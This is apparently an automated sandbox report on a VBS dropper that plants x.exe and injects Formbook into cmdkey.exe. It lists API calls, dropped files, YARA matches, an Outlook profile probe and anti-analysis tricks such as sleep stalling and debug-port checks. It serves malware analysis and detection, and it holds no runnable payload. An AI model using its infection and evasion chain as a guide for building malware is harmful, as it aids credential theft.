        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452F00 NtCreateFile,LdrInitializeThunk,5_2_03452F00
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452E50 NtCreateSection,LdrInitializeThunk,5_2_03452E50
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452E00 NtQueueApcThread,LdrInitializeThunk,5_2_03452E00
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452ED0 NtResumeThread,LdrInitializeThunk,5_2_03452ED0
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_03452D10
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452DA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_03452DA0
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452C50 NtUnmapViewOfSection,LdrInitializeThunk,5_2_03452C50
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452C30 NtMapViewOfSection,LdrInitializeThunk,5_2_03452C30
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452CF0 NtDelayExecution,LdrInitializeThunk,5_2_03452CF0
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452B20 NtQueryInformationProcess,5_2_03452B20
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452BE0 NtQueryVirtualMemory,5_2_03452BE0
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452AA0 NtQueryInformationFile,5_2_03452AA0
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_034529D0 NtWaitForSingleObject,5_2_034529D0
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452F30 NtOpenDirectoryObject,5_2_03452F30
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452FB0 NtSetValueKey,5_2_03452FB0
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452EC0 NtQuerySection,5_2_03452EC0
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452E80 NtCreateProcessEx,5_2_03452E80
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452EB0 NtProtectVirtualMemory,5_2_03452EB0
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452D50 NtWriteVirtualMemory,5_2_03452D50
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452DC0 NtAdjustPrivilegesToken,5_2_03452DC0
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452C10 NtOpenProcess,5_2_03452C10
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452C20 NtSetInformationFile,5_2_03452C20
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03453C30 NtOpenProcessToken,5_2_03453C30
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452CD0 NtEnumerateKey,5_2_03452CD0
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03453C90 NtOpenThread,5_2_03453C90
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_00A59200 NtCreateFile,5_2_00A59200
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_00A59370 NtReadFile,5_2_00A59370
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_00A59460 NtDeleteFile,5_2_00A59460
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_00A59500 NtClose,5_2_00A59500
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_00A59670 NtAllocateVirtualMemory,5_2_00A59670
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_0333F36F NtReadVirtualMemory,5_2_0333F36F
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_004034CE EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,2_2_004034CE
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034BD1305_2_034BD130
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034251C05_2_034251C0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0343B1E05_2_0343B1E0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034CE0765_2_034CE076
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0342B0D05_2_0342B0D0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D70F15_2_034D70F1
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034100A05_2_034100A0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D67575_2_034D6757
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034227605_2_03422760
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0342A7605_2_0342A760
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034CD6465_2_034CD646
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034446705_2_03444670
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0343C6005_2_0343C600
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034BD62C5_2_034BD62C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DA6C05_2_034DA6C0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0341C6E05_2_0341C6E0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DF6F65_2_034DF6F6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034206805_2_03420680
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034EA5265_2_034EA526
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DF5C95_2_034DF5C9
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D75C65_2_034D75C6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034204455_2_03420445
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03420B105_2_03420B10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DFB2E5_2_034DFB2E
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03494BC05_2_03494BC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DEA5B5_2_034DEA5B
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DCA135_2_034DCA13
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DFA895_2_034DFA89
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0343FAA05_2_0343FAA0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_033E99E85_2_033E99E8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0341E9A05_2_0341E9A0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DE9A65_2_034DE9A6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034068685_2_03406868
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034298705_2_03429870
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0343B8705_2_0343B870
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DF8725_2_034DF872
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034238005_2_03423800
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034C08355_2_034C0835
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034228C05_2_034228C0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D78F35_2_034D78F3
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034368825_2_03436882
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DFF635_2_034DFF63
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0342CF005_2_0342CF00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D1FC65_2_034D1FC6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03426FE05_2_03426FE0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DEFBF5_2_034DEFBF
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03440E505_2_03440E50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034C0E6D5_2_034C0E6D
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D9ED25_2_034D9ED2
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03412EE85_2_03412EE8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D0EAD5_2_034D0EAD
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03421EB25_2_03421EB2
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D7D4C5_2_034D7D4C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03420D695_2_03420D69
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0341AD005_2_0341AD00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DFD275_2_034DFD27
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03429DD05_2_03429DD0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034BFDF45_2_034BFDF4
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03432DB05_2_03432DB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034CEC4C5_2_034CEC4C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03423C605_2_03423C60
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D6C695_2_034D6C69
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DEC605_2_034DEC60
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03410C125_2_03410C12
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0342AC205_2_0342AC20
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03438CDF5_2_03438CDF
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0343FCE05_2_0343FCE0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034EACEB5_2_034EACEB
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034B9C985_2_034B9C98
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A41DC05_2_00A41DC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A3B1885_2_00A3B188
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A311225_2_00A31122
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A454905_2_00A45490
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A436705_2_00A43670
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A5BB305_2_00A5BB30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A3CD0C5_2_00A3CD0C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A3CD105_2_00A3CD10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A3AFB05_2_00A3AFB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A3CF305_2_00A3CF30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0333E3D55_2_0333E3D5
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0333E4F35_2_0333E4F3
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0333E88C5_2_0333E88C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0333D8F85_2_0333D8F8
        Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp\System.dll 90F3CEBB5B3759EB1BD72CEE7CD8B694440EE398FE970B763DB7A7B67208E4C8
        Source: #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs Initial sample: Strings found which are bigger than 50
        Source: 00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.136239540037.0000000035220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.140485253633.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@9/9@19/14
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_004034CE EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx
        Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\user\AppData\Local\dipuskompleks.ini
        Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\x.exe
        Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs"
        Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs Virustotal: Detection: 12%
        Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
        Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
        Source: C:\Windows\SysWOW64\cmdkey.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, edgegdi.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, msxml3.dll, scrrun.dll, msdart.dll, mpr.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: edgegdi.dll, uxtheme.dll, userenv.dll, apphelp.dll, propsys.dll, dwmapi.dll, cryptbase.dll, oleacc.dll, ntmarta.dll, version.dll, shfolder.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, profapi.dll, susen.dll, susen.dll, edgegdi.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll
        Source: C:\Windows\SysWOW64\cmdkey.exe Section loaded: wininet.dll, edgegdi.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
        Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: C:\Windows\SysWOW64\cmdkey.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs Static file information: File size 1168335 > 1048576
        Source: Binary string: wntdll.pdb source: x.exe, cmdkey.exe

        Data Obfuscation

        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\x.exe", "1", "true");
        Source: Yara matchFile source: 00000003.00000002.136219856391.000000000258E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.136009104486.00000000038BE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_73AD2288 GlobalFree,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,2_2_73AD2288
        Source: C:\Users\user\AppData\Local\Temp\x.exe, File created: C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp\System.dll
        Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Temp\x.exe
        Source: C:\Windows\System32\wscript.exe, Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\x.exe, Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmdkey.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\AppData\Local\Temp\x.exe, Stalling execution: Execution stalls by calling Sleep (graph_2-3041)
        Source: C:\Users\user\AppData\Local\Temp\x.exe, API/Special instruction interceptor: Address: 3F7BCFD
        Source: C:\Users\user\AppData\Local\Temp\x.exe, API/Special instruction interceptor: Address: 2C4BCFD
        Source: C:\Windows\SysWOW64\cmdkey.exe, API/Special instruction interceptor: Address: 7FFFD506D144
        Source: C:\Windows\SysWOW64\cmdkey.exe, API/Special instruction interceptor: Address: 7FFFD506D604
        Source: C:\Windows\SysWOW64\cmdkey.exe, API/Special instruction interceptor: Address: 7FFFD506D764
        Source: C:\Windows\SysWOW64\cmdkey.exe, API/Special instruction interceptor: Address: 7FFFD506D324
        Source: C:\Windows\SysWOW64\cmdkey.exe, API/Special instruction interceptor: Address: 7FFFD506D364
        Source: C:\Windows\SysWOW64\cmdkey.exe, API/Special instruction interceptor: Address: 7FFFD506D004
        Source: C:\Windows\SysWOW64\cmdkey.exe, API/Special instruction interceptor: Address: 7FFFD506FF74
        Source: C:\Windows\SysWOW64\cmdkey.exe, API/Special instruction interceptor: Address: 7FFFD506D864
        Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 3_2_34541763 rdtsc
        Source: C:\Windows\System32\wscript.exe, Window found: window name: WSH-Timer
        Source: C:\Windows\SysWOW64\cmdkey.exe, Window / User API: threadDelayed 8944
        Source: C:\Users\user\AppData\Local\Temp\x.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp\System.dll
        Source: C:\Users\user\AppData\Local\Temp\x.exe, API coverage: 0.2 %
        Source: C:\Windows\SysWOW64\cmdkey.exe, API coverage: 3.2 %
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 6336, Thread sleep count: 120 > 30
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 6336, Thread sleep time: -240000s >= -30000s
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 6336, Thread sleep count: 8944 > 30
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 6336, Thread sleep time: -17888000s >= -30000s
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe TID: 5100, Thread sleep time: -90000s >= -30000s
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe TID: 5100, Thread sleep count: 38 > 30
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe TID: 5100, Thread sleep time: -57000s >= -30000s
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe TID: 5100, Thread sleep count: 43 > 30
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe TID: 5100, Thread sleep time: -43000s >= -30000s
        Source: C:\Windows\SysWOW64\cmdkey.exe, Last function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 2_2_0040627E FindFirstFileA,FindClose
        Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 2_2_004063BE GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
        Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 5_2_00A4C710 FindFirstFileW,FindNextFileW,FindClose
        Source: wscript.exe, 00000000.00000003.135407958651.000001562EF21000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: lEdgchX5LPqEmu69jse7zXbd1bDzwZ2Pmkbkd&&&btR1ZU9+X)737)m
        Source: wscript.exe, 00000000.00000003.135421821173.000001562E91E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135423382734.000001562E92C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135421214491.000001562E913000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135423330792.000001562E920000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: lEdgchX5LPqEmu69jse7zXbd1bDzwZ2Pmkbkd&&&btR1ZU9+X)737)mW
        Source: wscript.exe, 00000000.00000003.135436511679.000001562AF71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135452657654.000001562AFC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135435935423.000001562ECDC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135452379056.000001562AFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135444066039.000001562AF92000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135439188967.000001562ECE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135436931344.000001562AF7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135436321211.000001562AF5E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: 7sWsnONCa;;sS..j&&&N..cAEGWAEdgchX5LPqEmu69jse7zXbd1bDzwZ2Pmkbkd&&&btR1ZU9+X
        Source: C:\Users\user\AppData\Local\Temp\x.exe, API call chain: ExitProcess graph end node (graph_2-2627)
        Source: C:\Windows\SysWOW64\cmdkey.exe, Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\cmdkey.exe, Process queried: DebugPort
        Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 3_2_34541763 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 3_2_345434E0 NtCreateMutant,LdrInitializeThunk
